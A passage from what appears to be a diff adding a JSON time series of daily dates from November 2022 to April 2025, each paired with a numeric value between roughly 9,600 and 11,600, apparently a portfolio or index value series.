"2022-11-08", + 9648.298500090821 + ], + [ + "2022-11-09", + 9623.24624060549 + ], + [ + "2022-11-10", + 9672.344097103203 + ], + [ + "2022-11-11", + 9670.875045579578 + ], + [ + "2022-11-14", + 9681.774905747498 + ], + [ + "2022-11-15", + 9700.10238158467 + ], + [ + "2022-11-16", + 9701.240239618604 + ], + [ + "2022-11-17", + 9702.378231127512 + ], + [ + "2022-11-18", + 9700.52635612705 + ], + [ + "2022-11-21", + 9707.392927751402 + ], + [ + "2022-11-22", + 9726.184854531715 + ], + [ + "2022-11-23", + 9727.325772136592 + ], + [ + "2022-11-25", + 9725.476823575342 + ], + [ + "2022-11-28", + 9727.395521075574 + ], + [ + "2022-11-29", + 9724.31849348587 + ], + [ + "2022-11-30", + 9764.260578776213 + ], + [ + "2022-12-01", + 9765.40596280495 + ], + [ + "2022-12-02", + 9763.56148119149 + ], + [ + "2022-12-05", + 9759.066663006835 + ], + [ + "2022-12-06", + 9728.762142695095 + ], + [ + "2022-12-07", + 9728.513375888375 + ], + [ + "2022-12-08", + 9764.59821891289 + ], + [ + "2022-12-09", + 9755.976406777456 + ], + [ + "2022-12-12", + 9786.996100356946 + ], + [ + "2022-12-13", + 9803.138913705661 + ], + [ + "2022-12-14", + 9802.05819090661 + ], + [ + "2022-12-15", + 9731.253958668765 + ], + [ + "2022-12-16", + 9718.964155293159 + ], + [ + "2022-12-19", + 9694.924811936595 + ], + [ + "2022-12-20", + 9697.35219802639 + ], + [ + "2022-12-21", + 9720.235786991765 + ], + [ + "2022-12-22", + 9688.842256609081 + ], + [ + "2022-12-23", + 9695.346996744105 + ], + [ + "2022-12-27", + 9666.287115303878 + ], + [ + "2022-12-28", + 9650.286238751354 + ], + [ + "2022-12-29", + 9691.393610488729 + ], + [ + "2022-12-30", + 9695.734668188532 + ], + [ + "2023-01-03", + 9702.108431207493 + ], + [ + "2023-01-04", + 9712.595180251457 + ], + [ + "2023-01-05", + 9693.61178688149 + ], + [ + "2023-01-06", + 9728.435849736388 + ], + [ + "2023-01-09", + 9747.501870391368 + ], + [ + "2023-01-10", + 9751.732481408528 + ], + [ + "2023-01-11", + 9752.876395844916 + ], + [ + "2023-01-12", + 9754.020444466718 + ], + [ + "2023-01-13", + 9755.16462728967 + ], + [ + "2023-01-17", + 9756.308944329518 + ], + [ + "2023-01-18", + 9757.453395602004 + ], + [ + "2023-01-19", + 9758.597981122875 + ], + [ + "2023-01-20", + 9759.742700907878 + ], + [ + "2023-01-23", + 9760.887554972764 + ], + [ + "2023-01-24", + 9762.032543333282 + ], + [ + "2023-01-25", + 9763.177666005187 + ], + [ + "2023-01-26", + 9764.322923004236 + ], + [ + "2023-01-27", + 9765.468314346183 + ], + [ + "2023-01-30", + 9766.613840046788 + ], + [ + "2023-01-31", + 9767.759500121812 + ], + [ + "2023-02-01", + 9768.905294587019 + ], + [ + "2023-02-02", + 9770.051223458171 + ], + [ + "2023-02-03", + 9771.197286751036 + ], + [ + "2023-02-06", + 9772.34348448138 + ], + [ + "2023-02-07", + 9773.489816664976 + ], + [ + "2023-02-08", + 9771.646283317594 + ], + [ + "2023-02-09", + 9766.081389220253 + ], + [ + "2023-02-10", + 9761.739896450164 + ], + [ + "2023-02-13", + 9792.387497667878 + ], + [ + "2023-02-14", + 9793.53618108866 + ], + [ + "2023-02-15", + 9791.694999254274 + ], + [ + "2023-02-16", + 9768.737739025448 + ], + [ + "2023-02-17", + 9763.756998900615 + ], + [ + "2023-02-21", + 9721.34229199569 + ], + [ + "2023-02-22", + 9720.938556632773 + ], + [ + "2023-02-23", + 9739.23778134251 + ], + [ + "2023-02-24", + 9714.16760679449 + ], + [ + "2023-02-27", + 9745.354600800607 + ], + [ + "2023-02-28", + 9745.010439572916 + ], + [ + "2023-03-01", + 9735.265756676612 + ], + [ + "2023-03-02", + 9757.144676443162 + ], + [ + "2023-03-03", + 9794.46508598373 + ], + [ + "2023-03-06", + 9810.017788898496 + ], + [ + "2023-03-07", + 9807.746047750341 + ], + [ + "2023-03-08", + 9822.932110027972 + ], + [ + "2023-03-09", + 9789.751278472646 + ], + [ + "2023-03-10", + 9749.682759573261 + ], + [ + "2023-03-13", + 9770.993237612896 + ], + [ + "2023-03-14", + 9794.93513924121 + ], + [ + "2023-03-15", + 9799.82543957439 + ], + [ + "2023-03-16", + 9802.358123530757 + ], + [ + "2023-03-17", + 9803.472674665023 + ], + [ + "2023-03-20", + 9804.622658418235 + ], + [ + "2023-03-21", + 9805.772777068813 + ], + [ + "2023-03-22", + 9806.923030632579 + ], + [ + "2023-03-23", + 9808.073419125361 + ], + [ + "2023-03-24", + 9809.223942562985 + ], + [ + "2023-03-27", + 9810.374600961282 + ], + [ + "2023-03-28", + 9811.525394336082 + ], + [ + "2023-03-29", + 9812.676322703219 + ], + [ + "2023-03-30", + 9813.827386078527 + ], + [ + "2023-03-31", + 9814.978584477843 + ], + [ + "2023-04-03", + 9816.12991791701 + ], + [ + "2023-04-04", + 9817.281386411862 + ], + [ + "2023-04-05", + 9818.432989978246 + ], + [ + "2023-04-06", + 9819.584728632006 + ], + [ + "2023-04-10", + 9820.736602388986 + ], + [ + "2023-04-11", + 9821.888611265036 + ], + [ + "2023-04-12", + 9823.040755276006 + ], + [ + "2023-04-13", + 9824.193034437747 + ], + [ + "2023-04-14", + 9825.345448766113 + ], + [ + "2023-04-17", + 9826.49799827696 + ], + [ + "2023-04-18", + 9827.650682986145 + ], + [ + "2023-04-19", + 9828.803502909526 + ], + [ + "2023-04-20", + 9829.956458062967 + ], + [ + "2023-04-21", + 9831.10954846233 + ], + [ + "2023-04-24", + 9832.262774123477 + ], + [ + "2023-04-25", + 9833.416135062278 + ], + [ + "2023-04-26", + 9834.5696312946 + ], + [ + "2023-04-27", + 9835.723262836314 + ], + [ + "2023-04-28", + 9836.877029703293 + ], + [ + "2023-05-01", + 9838.030931911411 + ], + [ + "2023-05-02", + 9839.184969476542 + ], + [ + "2023-05-03", + 9840.339142414567 + ], + [ + "2023-05-04", + 9841.493450741362 + ], + [ + "2023-05-05", + 9842.647894472811 + ], + [ + "2023-05-08", + 9843.802473624797 + ], + [ + "2023-05-09", + 9844.957188213206 + ], + [ + "2023-05-10", + 9846.112038253925 + ], + [ + "2023-05-11", + 9847.267023762843 + ], + [ + "2023-05-12", + 9848.42214475585 + ], + [ + "2023-05-15", + 9849.57740124884 + ], + [ + "2023-05-16", + 9850.732793257706 + ], + [ + "2023-05-17", + 9851.888320798347 + ], + [ + "2023-05-18", + 9853.043983886659 + ], + [ + "2023-05-19", + 9854.199782538542 + ], + [ + "2023-05-22", + 9855.3557167699 + ], + [ + "2023-05-23", + 9856.511786596637 + ], + [ + "2023-05-24", + 9857.667992034658 + ], + [ + "2023-05-25", + 9858.82433309987 + ], + [ + "2023-05-26", + 9859.980809808185 + ], + [ + "2023-05-30", + 9861.137422175512 + ], + [ + "2023-05-31", + 9862.294170217765 + ], + [ + "2023-06-01", + 9863.45105395086 + ], + [ + "2023-06-02", + 9864.608073390711 + ], + [ + "2023-06-05", + 9865.76522855324 + ], + [ + "2023-06-06", + 9866.922519454369 + ], + [ + "2023-06-07", + 9868.079946110018 + ], + [ + "2023-06-08", + 9869.23750853611 + ], + [ + "2023-06-09", + 9870.395206748577 + ], + [ + "2023-06-12", + 9871.553040763343 + ], + [ + "2023-06-13", + 9872.711010596338 + ], + [ + "2023-06-14", + 9873.869116263495 + ], + [ + "2023-06-15", + 9875.027357780747 + ], + [ + "2023-06-16", + 9876.185735164032 + ], + [ + "2023-06-20", + 9877.344248429286 + ], + [ + "2023-06-21", + 9878.502897592449 + ], + [ + "2023-06-22", + 9879.66168266946 + ], + [ + "2023-06-23", + 9880.820603676266 + ], + [ + "2023-06-26", + 9881.97966062881 + ], + [ + "2023-06-27", + 9883.138853543038 + ], + [ + "2023-06-28", + 9884.2981824349 + ], + [ + "2023-06-29", + 9885.457647320347 + ], + [ + "2023-06-30", + 9886.61724821533 + ], + [ + "2023-07-03", + 9887.776985135806 + ], + [ + "2023-07-05", + 9888.93685809773 + ], + [ + "2023-07-06", + 9890.09686711706 + ], + [ + "2023-07-07", + 9891.257012209755 + ], + [ + "2023-07-10", + 9892.417293391778 + ], + [ + "2023-07-11", + 9893.577710679094 + ], + [ + "2023-07-12", + 9894.738264087666 + ], + [ + "2023-07-13", + 9895.898953633463 + ], + [ + "2023-07-14", + 9897.059779332454 + ], + [ + "2023-07-17", + 9898.220741200612 + ], + [ + "2023-07-18", + 9899.381839253909 + ], + [ + "2023-07-19", + 9900.54307350832 + ], + [ + "2023-07-20", + 9901.70444397982 + ], + [ + "2023-07-21", + 9902.865950684389 + ], + [ + "2023-07-24", + 9904.02759363801 + ], + [ + "2023-07-25", + 9905.189372856663 + ], + [ + "2023-07-26", + 9906.351288356333 + ], + [ + "2023-07-27", + 9907.513340153006 + ], + [ + "2023-07-28", + 9908.67552826267 + ], + [ + "2023-07-31", + 9909.837852701316 + ], + [ + "2023-08-01", + 9911.000313484934 + ], + [ + "2023-08-02", + 9912.16291062952 + ], + [ + "2023-08-03", + 9913.32564415107 + ], + [ + "2023-08-04", + 9914.488514065579 + ], + [ + "2023-08-07", + 9915.651520389049 + ], + [ + "2023-08-08", + 9916.814663137478 + ], + [ + "2023-08-09", + 9917.977942326872 + ], + [ + "2023-08-10", + 9919.141357973234 + ], + [ + "2023-08-11", + 9920.304910092573 + ], + [ + "2023-08-14", + 9921.468598700896 + ], + [ + "2023-08-15", + 9922.632423814215 + ], + [ + "2023-08-16", + 9923.796385448542 + ], + [ + "2023-08-17", + 9924.960483619892 + ], + [ + "2023-08-18", + 9926.124718344281 + ], + [ + "2023-08-21", + 9927.289089637727 + ], + [ + "2023-08-22", + 9928.453597516249 + ], + [ + "2023-08-23", + 9929.618241995871 + ], + [ + "2023-08-24", + 9930.783023092616 + ], + [ + "2023-08-25", + 9931.947940822509 + ], + [ + "2023-08-28", + 9933.112995201578 + ], + [ + "2023-08-29", + 9934.278186245852 + ], + [ + "2023-08-30", + 9935.443513971364 + ], + [ + "2023-08-31", + 9936.608978394146 + ], + [ + "2023-09-01", + 9937.774579530233 + ], + [ + "2023-09-05", + 9938.940317395662 + ], + [ + "2023-09-06", + 9940.106192006471 + ], + [ + "2023-09-07", + 9941.272203378703 + ], + [ + "2023-09-08", + 9942.438351528399 + ], + [ + "2023-09-11", + 9943.604636471604 + ], + [ + "2023-09-12", + 9944.771058224364 + ], + [ + "2023-09-13", + 9945.937616802727 + ], + [ + "2023-09-14", + 9947.104312222744 + ], + [ + "2023-09-15", + 9948.271144500466 + ], + [ + "2023-09-18", + 9949.438113651948 + ], + [ + "2023-09-19", + 9950.605219693245 + ], + [ + "2023-09-20", + 9951.772462640416 + ], + [ + "2023-09-21", + 9952.939842509519 + ], + [ + "2023-09-22", + 9954.107359316617 + ], + [ + "2023-09-25", + 9955.275013077771 + ], + [ + "2023-09-26", + 9956.442803809048 + ], + [ + "2023-09-27", + 9957.610731526514 + ], + [ + "2023-09-28", + 9958.77879624624 + ], + [ + "2023-09-29", + 9959.946997984296 + ], + [ + "2023-10-02", + 9961.115336756753 + ], + [ + "2023-10-03", + 9962.283812579688 + ], + [ + "2023-10-04", + 9963.452425469177 + ], + [ + "2023-10-05", + 9964.621175441298 + ], + [ + "2023-10-06", + 9965.790062512131 + ], + [ + "2023-10-09", + 9966.959086697758 + ], + [ + "2023-10-10", + 9968.128248014264 + ], + [ + "2023-10-11", + 9969.297546477734 + ], + [ + "2023-10-12", + 9970.466982104255 + ], + [ + "2023-10-13", + 9971.63655490992 + ], + [ + "2023-10-16", + 9972.806264910818 + ], + [ + "2023-10-17", + 9973.976112123044 + ], + [ + "2023-10-18", + 9975.146096562692 + ], + [ + "2023-10-19", + 9976.31621824586 + ], + [ + "2023-10-20", + 9977.486477188648 + ], + [ + "2023-10-23", + 9978.656873407155 + ], + [ + "2023-10-24", + 9979.827406917486 + ], + [ + "2023-10-25", + 9980.998077735743 + ], + [ + "2023-10-26", + 9982.168885878036 + ], + [ + "2023-10-27", + 9983.339831360472 + ], + [ + "2023-10-30", + 9981.520914199162 + ], + [ + "2023-10-31", + 9991.867296689887 + ], + [ + "2023-11-01", + 9999.490792777056 + ], + [ + "2023-11-02", + 10000.663770183502 + ], + [ + "2023-11-03", + 10001.836885184555 + ], + [ + "2023-11-06", + 10000.020137796355 + ], + [ + "2023-11-07", + 10011.02436427423 + ], + [ + "2023-11-08", + 10012.198694611447 + ], + [ + "2023-11-09", + 10013.373162701973 + ], + [ + "2023-11-10", + 10014.547768561968 + ], + [ + "2023-11-13", + 10012.732512207593 + ], + [ + "2023-11-14", + 10031.644475488612 + ], + [ + "2023-11-15", + 10032.821224641453 + ], + [ + "2023-11-16", + 10033.99811183134 + ], + [ + "2023-11-17", + 10035.175137074466 + ], + [ + "2023-11-20", + 10036.352300387023 + ], + [ + "2023-11-21", + 10037.529601785209 + ], + [ + "2023-11-22", + 10038.70704128522 + ], + [ + "2023-11-24", + 10039.88461890326 + ], + [ + "2023-11-27", + 10041.062334655526 + ], + [ + "2023-11-28", + 10042.240188558224 + ], + [ + "2023-11-29", + 10043.41818062756 + ], + [ + "2023-11-30", + 10044.596310879739 + ], + [ + "2023-12-01", + 10045.774579330973 + ], + [ + "2023-12-04", + 10046.952985997472 + ], + [ + "2023-12-05", + 10048.131530895449 + ], + [ + "2023-12-06", + 10049.31021404112 + ], + [ + "2023-12-07", + 10050.4890354507 + ], + [ + "2023-12-08", + 10051.667995140411 + ], + [ + "2023-12-11", + 10052.847093126473 + ], + [ + "2023-12-12", + 10054.026329425107 + ], + [ + "2023-12-13", + 10055.205704052538 + ], + [ + "2023-12-14", + 10056.385217024992 + ], + [ + "2023-12-15", + 10057.564868358699 + ], + [ + "2023-12-18", + 10058.744658069889 + ], + [ + "2023-12-19", + 10059.924586174793 + ], + [ + "2023-12-20", + 10061.104652689646 + ], + [ + "2023-12-21", + 10062.284857630684 + ], + [ + "2023-12-22", + 10063.465201014144 + ], + [ + "2023-12-26", + 10064.645682856266 + ], + [ + "2023-12-27", + 10065.826303173293 + ], + [ + "2023-12-28", + 10067.007061981469 + ], + [ + "2023-12-29", + 10068.187959297036 + ], + [ + "2024-01-02", + 10066.378995136243 + ], + [ + "2024-01-03", + 10053.688428899717 + ], + [ + "2024-01-04", + 10045.177656043019 + ], + [ + "2024-01-05", + 10055.20752335682 + ], + [ + "2024-01-08", + 10080.752546396434 + ], + [ + "2024-01-09", + 10078.945056108372 + ], + [ + "2024-01-10", + 10086.088658631043 + ], + [ + "2024-01-11", + 10087.271794288763 + ], + [ + "2024-01-12", + 10088.45506873269 + ], + [ + "2024-01-16", + 10086.648481979104 + ], + [ + "2024-01-17", + 10082.586874128727 + ], + [ + "2024-01-18", + 10095.502694181734 + ], + [ + "2024-01-19", + 10096.686934140787 + ], + [ + "2024-01-22", + 10097.871313015587 + ], + [ + "2024-01-23", + 10099.055830822426 + ], + [ + "2024-01-24", + 10100.240487577603 + ], + [ + "2024-01-25", + 10101.425283297416 + ], + [ + "2024-01-26", + 10102.610217998168 + ], + [ + "2024-01-29", + 10103.79529169616 + ], + [ + "2024-01-30", + 10104.9805044077 + ], + [ + "2024-01-31", + 10103.175856149091 + ], + [ + "2024-02-01", + 10115.96451938996 + ], + [ + "2024-02-02", + 10117.151159597102 + ], + [ + "2024-02-05", + 10118.337939001547 + ], + [ + "2024-02-06", + 10119.524857619625 + ], + [ + "2024-02-07", + 10120.711915467664 + ], + [ + "2024-02-08", + 10121.899112561996 + ], + [ + "2024-02-09", + 10123.086448918957 + ], + [ + "2024-02-12", + 10124.273924554882 + ], + [ + "2024-02-13", + 10122.47153948611 + ], + [ + "2024-02-14", + 10136.854467066558 + ], + [ + "2024-02-15", + 10138.043557742145 + ], + [ + "2024-02-16", + 10139.232787902483 + ], + [ + "2024-02-20", + 10137.432157563935 + ], + [ + "2024-02-21", + 10135.688011449945 + ], + [ + "2024-02-22", + 10154.936626023959 + ], + [ + "2024-02-23", + 10156.127837803944 + ], + [ + "2024-02-26", + 10157.319189317495 + ], + [ + "2024-02-27", + 10155.520680581005 + ], + [ + "2024-02-28", + 10151.214019500523 + ], + [ + "2024-02-29", + 10174.131797461137 + ], + [ + "2024-03-01", + 10175.32526090602 + ], + [ + "2024-03-04", + 10176.518864348598 + ], + [ + "2024-03-05", + 10174.722607805294 + ], + [ + "2024-03-06", + 10189.401859656584 + ], + [ + "2024-03-07", + 10200.32132217708 + ], + [ + "2024-03-08", + 10201.517857750476 + ], + [ + "2024-03-11", + 10202.714533681938 + ], + [ + "2024-03-12", + 10200.921349987932 + ], + [ + "2024-03-13", + 10193.194713694662 + ], + [ + "2024-03-14", + 10195.392619930128 + ], + [ + "2024-03-15", + 10157.902200802588 + ], + [ + "2024-03-18", + 10225.862350471272 + ], + [ + "2024-03-19", + 10224.071882102142 + ], + [ + "2024-03-20", + 10242.849939593567 + ], + [ + "2024-03-21", + 10244.05146393173 + ], + [ + "2024-03-22", + 10245.25312921316 + ], + [ + "2024-03-25", + 10246.45493545439 + ], + [ + "2024-03-26", + 10244.666882671956 + ], + [ + "2024-03-27", + 10254.82493689883 + ], + [ + "2024-03-28", + 10257.847647367498 + ], + [ + "2024-04-01", + 10269.504429482186 + ], + [ + "2024-04-02", + 10267.719080491002 + ], + [ + "2024-04-03", + 10276.60424248378 + ], + [ + "2024-04-04", + 10277.80972632703 + ], + [ + "2024-04-05", + 10279.015351578013 + ], + [ + "2024-04-08", + 10280.221118253314 + ], + [ + "2024-04-09", + 10278.437026369524 + ], + [ + "2024-04-10", + 10271.04379856284 + ], + [ + "2024-04-11", + 10287.294895150982 + ], + [ + "2024-04-12", + 10288.501633047494 + ], + [ + "2024-04-15", + 10289.708512498843 + ], + [ + "2024-04-16", + 10287.925533521633 + ], + [ + "2024-04-17", + 10266.169179440447 + ], + [ + "2024-04-18", + 10257.965648363477 + ], + [ + "2024-04-19", + 10155.144947569357 + ], + [ + "2024-04-22", + 10230.704262204668 + ], + [ + "2024-04-23", + 10305.526180211962 + ], + [ + "2024-04-24", + 10315.301997878822 + ], + [ + "2024-04-25", + 10313.610915998384 + ], + [ + "2024-04-26", + 10327.749304877223 + ], + [ + "2024-04-29", + 10328.960788226237 + ], + [ + "2024-04-30", + 10327.182413686747 + ], + [ + "2024-05-01", + 10319.1243378099 + ], + [ + "2024-05-02", + 10343.773625425569 + ], + [ + "2024-05-03", + 10344.986988486893 + ], + [ + "2024-05-06", + 10346.200493880211 + ], + [ + "2024-05-07", + 10344.42414162222 + ], + [ + "2024-05-08", + 10351.723640882125 + ], + [ + "2024-05-09", + 10365.534465998931 + ], + [ + "2024-05-10", + 10374.913811195069 + ], + [ + "2024-05-13", + 10376.130827115834 + ], + [ + "2024-05-14", + 10374.357985797087 + ], + [ + "2024-05-15", + 10396.004840094076 + ], + [ + "2024-05-16", + 10397.22433007086 + ], + [ + "2024-05-17", + 10398.443963098347 + ], + [ + "2024-05-20", + 10399.663739193318 + ], + [ + "2024-05-21", + 10400.883658372555 + ], + [ + "2024-05-22", + 10402.103720652842 + ], + [ + "2024-05-23", + 10403.323926050965 + ], + [ + "2024-05-24", + 10404.544274583714 + ], + [ + "2024-05-28", + 10405.764766267877 + ], + [ + "2024-05-29", + 10406.985401120248 + ], + [ + "2024-05-30", + 10405.21617915762 + ], + [ + "2024-05-31", + 10409.765859785684 + ], + [ + "2024-06-03", + 10416.195758781148 + ], + [ + "2024-06-04", + 10417.41761722768 + ], + [ + "2024-06-05", + 10418.639619002746 + ], + [ + "2024-06-06", + 10419.861764123158 + ], + [ + "2024-06-07", + 10421.08405260573 + ], + [ + "2024-06-10", + 10422.306484467283 + ], + [ + "2024-06-11", + 10423.529059724631 + ], + [ + "2024-06-12", + 10424.751778394599 + ], + [ + "2024-06-13", + 10425.974640494007 + ], + [ + "2024-06-14", + 10427.19764603968 + ], + [ + "2024-06-17", + 10428.420795048447 + ], + [ + "2024-06-18", + 10429.644087537135 + ], + [ + "2024-06-20", + 10430.867523522575 + ], + [ + "2024-06-21", + 10432.0911030216 + ], + [ + "2024-06-24", + 10430.324826051043 + ], + [ + "2024-06-25", + 10441.18347016044 + ], + [ + "2024-06-26", + 10442.408259758316 + ], + [ + "2024-06-27", + 10443.633193028561 + ], + [ + "2024-06-28", + 10444.858269988028 + ], + [ + "2024-07-01", + 10446.083490653573 + ], + [ + "2024-07-02", + 10447.30885504205 + ], + [ + "2024-07-03", + 10448.534363170324 + ], + [ + "2024-07-05", + 10449.76001505525 + ], + [ + "2024-07-08", + 10450.985810713695 + ], + [ + "2024-07-09", + 10452.211750162523 + ], + [ + "2024-07-10", + 10453.437833418602 + ], + [ + "2024-07-11", + 10451.6740604988 + ], + [ + "2024-07-12", + 10464.071869335592 + ], + [ + "2024-07-15", + 10465.299343827695 + ], + [ + "2024-07-16", + 10466.526962307116 + ], + [ + "2024-07-17", + 10467.754724790744 + ], + [ + "2024-07-18", + 10465.99263129547 + ], + [ + "2024-07-19", + 10448.720950178911 + ], + [ + "2024-07-22", + 10493.78554981357 + ], + [ + "2024-07-23", + 10495.016509830746 + ], + [ + "2024-07-24", + 10496.247614244103 + ], + [ + "2024-07-25", + 10494.488863070577 + ], + [ + "2024-07-26", + 10519.386713649685 + ], + [ + "2024-07-29", + 10537.553814203267 + ], + [ + "2024-07-30", + 10538.789908400404 + ], + [ + "2024-07-31", + 10540.02614759598 + ], + [ + "2024-08-01", + 10538.272531807002 + ], + [ + "2024-08-02", + 10457.143708597921 + ], + [ + "2024-08-05", + 10307.736715256062 + ], + [ + "2024-08-06", + 10374.403307152614 + ], + [ + "2024-08-07", + 10300.283871616572 + ], + [ + "2024-08-08", + 10538.26091452885 + ], + [ + "2024-08-09", + 10571.194421589587 + ], + [ + "2024-08-12", + 10625.908050980563 + ], + [ + "2024-08-13", + 10708.17009581565 + ], + [ + "2024-08-14", + 10727.093424909232 + ], + [ + "2024-08-15", + 10731.648278809143 + ], + [ + "2024-08-16", + 10749.213312132968 + ], + [ + "2024-08-19", + 10815.284958436825 + ], + [ + "2024-08-20", + 10816.553631528628 + ], + [ + "2024-08-21", + 10817.822453440496 + ], + [ + "2024-08-22", + 10816.101424189887 + ], + [ + "2024-08-23", + 10854.415895002645 + ], + [ + "2024-08-26", + 10865.893586006654 + ], + [ + "2024-08-27", + 10867.168195678423 + ], + [ + "2024-08-28", + 10868.44295486664 + ], + [ + "2024-08-29", + 10866.727863588843 + ], + [ + "2024-08-30", + 10904.960811233133 + ], + [ + "2024-09-03", + 10906.24000363551 + ], + [ + "2024-09-04", + 10907.519346091907 + ], + [ + "2024-09-05", + 10905.808838619925 + ], + [ + "2024-09-06", + 10816.214506981914 + ], + [ + "2024-09-09", + 10900.559053620627 + ], + [ + "2024-09-10", + 10937.372450149669 + ], + [ + "2024-09-11", + 10938.655444557662 + ], + [ + "2024-09-12", + 10936.948589465665 + ], + [ + "2024-09-13", + 10964.18781485548 + ], + [ + "2024-09-16", + 10978.10604415466 + ], + [ + "2024-09-17", + 10979.393816764508 + ], + [ + "2024-09-18", + 10980.681740434866 + ], + [ + "2024-09-19", + 10978.979815183453 + ], + [ + "2024-09-20", + 10987.33384295166 + ], + [ + "2024-09-23", + 11020.882788355802 + ], + [ + "2024-09-24", + 11022.17557883661 + ], + [ + "2024-09-25", + 11023.468520966542 + ], + [ + "2024-09-26", + 11021.771614763387 + ], + [ + "2024-09-27", + 11014.082005543543 + ], + [ + "2024-09-30", + 11051.198120473367 + ], + [ + "2024-10-01", + 11052.49446705522 + ], + [ + "2024-10-02", + 11053.79096570334 + ], + [ + "2024-10-03", + 11052.097616435567 + ], + [ + "2024-10-04", + 11082.965805053942 + ], + [ + "2024-10-07", + 11084.265878103175 + ], + [ + "2024-10-08", + 11085.566103655805 + ], + [ + "2024-10-09", + 11086.866481729721 + ], + [ + "2024-10-10", + 11085.177012342816 + ], + [ + "2024-10-11", + 11092.23067368054 + ], + [ + "2024-10-14", + 11105.88211768337 + ], + [ + "2024-10-15", + 11107.184878901182 + ], + [ + "2024-10-16", + 11108.487792937723 + ], + [ + "2024-10-17", + 11109.790859810919 + ], + [ + "2024-10-18", + 11111.0940795387 + ], + [ + "2024-10-21", + 11112.397452138994 + ], + [ + "2024-10-22", + 11113.700977629735 + ], + [ + "2024-10-23", + 11112.014656028856 + ], + [ + "2024-10-24", + 11122.61550426564 + ], + [ + "2024-10-25", + 11123.920228371842 + ], + [ + "2024-10-28", + 11125.225105527028 + ], + [ + "2024-10-29", + 11126.53013574915 + ], + [ + "2024-10-30", + 11127.835319056165 + ], + [ + "2024-10-31", + 11126.150655466026 + ], + [ + "2024-11-01", + 11141.277366772176 + ], + [ + "2024-11-04", + 11142.584279984158 + ], + [ + "2024-11-05", + 11143.891346501912 + ], + [ + "2024-11-06", + 11145.198566343424 + ], + [ + "2024-11-07", + 11146.505939526678 + ], + [ + "2024-11-08", + 11147.813466069661 + ], + [ + "2024-11-11", + 11149.121145990364 + ], + [ + "2024-11-12", + 11150.428979306778 + ], + [ + "2024-11-13", + 11151.736966036899 + ], + [ + "2024-11-14", + 11150.055106198719 + ], + [ + "2024-11-15", + 11041.074513605261 + ], + [ + "2024-11-18", + 11115.817720413384 + ], + [ + "2024-11-19", + 11160.441506362582 + ], + [ + "2024-11-20", + 11178.090546757028 + ], + [ + "2024-11-21", + 11176.41177829174 + ], + [ + "2024-11-22", + 11188.759880217698 + ], + [ + "2024-11-25", + 11212.673646058645 + ], + [ + "2024-11-26", + 11213.98893431934 + ], + [ + "2024-11-27", + 11215.304376868235 + ], + [ + "2024-11-29", + 11213.629973723426 + ], + [ + "2024-12-02", + 11241.50439806063 + ], + [ + "2024-12-03", + 11242.82306827561 + ], + [ + "2024-12-04", + 11244.141893175502 + ], + [ + "2024-12-05", + 11245.460872778453 + ], + [ + "2024-12-06", + 11246.780007102609 + ], + [ + "2024-12-09", + 11248.099296166121 + ], + [ + "2024-12-10", + 11249.41873998714 + ], + [ + "2024-12-11", + 11250.73833858382 + ], + [ + "2024-12-12", + 11249.068091974314 + ], + [ + "2024-12-13", + 11265.494914548672 + ], + [ + "2024-12-16", + 11266.816398940331 + ], + [ + "2024-12-17", + 11268.138038347017 + ], + [ + "2024-12-18", + 11269.459832786913 + ], + [ + "2024-12-19", + 11267.791782278207 + ], + [ + "2024-12-20", + 11290.449482573908 + ], + [ + "2024-12-23", + 11291.773894229074 + ], + [ + "2024-12-24", + 11293.098461242645 + ], + [ + "2024-12-26", + 11291.433183632847 + ], + [ + "2024-12-27", + 11245.164245450365 + ], + [ + "2024-12-30", + 11202.268262342119 + ], + [ + "2024-12-31", + 11144.110901860991 + ], + [ + "2025-01-02", + 11137.072170499088 + ], + [ + "2025-01-03", + 11233.094525812896 + ], + [ + "2025-01-06", + 11306.210326227589 + ], + [ + "2025-01-07", + 11255.343508732989 + ], + [ + "2025-01-08", + 11283.513642035163 + ], + [ + "2025-01-10", + 11161.691422199476 + ], + [ + "2025-01-13", + 11183.463708427751 + ], + [ + "2025-01-14", + 11189.696519777974 + ], + [ + "2025-01-15", + 11326.208529678934 + ], + [ + "2025-01-16", + 11326.494983854638 + ], + [ + "2025-01-17", + 11366.552812041098 + ], + [ + "2025-01-21", + 11430.682457907349 + ], + [ + "2025-01-22", + 11432.023319411324 + ], + [ + "2025-01-23", + 11433.364338203333 + ], + [ + "2025-01-24", + 11431.715514301826 + ], + [ + "2025-01-27", + 11299.045033844863 + ], + [ + "2025-01-28", + 11403.673486896363 + ], + [ + "2025-01-29", + 11416.210866357487 + ], + [ + "2025-01-30", + 11462.073995869687 + ], + [ + "2025-01-31", + 11485.96699908677 + ], + [ + "2025-02-03", + 11491.08131555984 + ], + [ + "2025-02-04", + 11530.838639947242 + ], + [ + "2025-02-05", + 11532.191250143334 + ], + [ + "2025-02-06", + 11533.544019005625 + ], + [ + "2025-02-07", + 11531.906946552728 + ], + [ + "2025-02-10", + 11575.7920150971 + ], + [ + "2025-02-11", + 11577.149898491047 + ], + [ + "2025-02-12", + 11578.507941169757 + ], + [ + "2025-02-13", + 11579.866143151918 + ], + [ + "2025-02-14", + 11578.234504456215 + ], + [ + "2025-02-18", + 11613.532968346257 + ], + [ + "2025-02-19", + 11614.895278894182 + ], + [ + "2025-02-20", + 11616.257749246195 + ], + [ + "2025-02-21", + 11614.63037942104 + ], + [ + "2025-02-24", + 11601.382845851058 + ], + [ + "2025-02-25", + 11559.513035488431 + ], + [ + "2025-02-26", + 11592.33494044022 + ], + [ + "2025-02-27", + 11316.387298999827 + ], + [ + "2025-02-28", + 11476.868662522425 + ], + [ + "2025-03-03", + 11315.522956123174 + ], + [ + "2025-03-04", + 11303.85450715089 + ], + [ + "2025-03-05", + 11386.414197131586 + ], + [ + "2025-03-06", + 11196.88381443016 + ], + [ + "2025-03-07", + 11262.091348056787 + ], + [ + "2025-03-10", + 10905.048954568389 + ], + [ + "2025-03-11", + 10900.495145250135 + ], + [ + "2025-03-12", + 10962.11685961843 + ], + [ + "2025-03-13", + 10876.126319572113 + ], + [ + "2025-03-14", + 11001.664426339632 + ], + [ + "2025-03-17", + 11077.945681654352 + ], + [ + "2025-03-18", + 11032.367091435648 + ], + [ + "2025-03-19", + 11084.486670162509 + ], + [ + "2025-03-20", + 11088.188053651198 + ], + [ + "2025-03-21", + 11113.454904834634 + ], + [ + "2025-03-24", + 11152.785660395339 + ], + [ + "2025-03-25", + 11180.775949508596 + ], + [ + "2025-03-26", + 11133.692133892833 + ], + [ + "2025-03-27", + 11133.458990911664 + ], + [ + "2025-03-28", + 10991.1356198427 + ], + [ + "2025-03-31", + 11012.094637306916 + ], + [ + "2025-04-01", + 11055.488699837895 + ], + [ 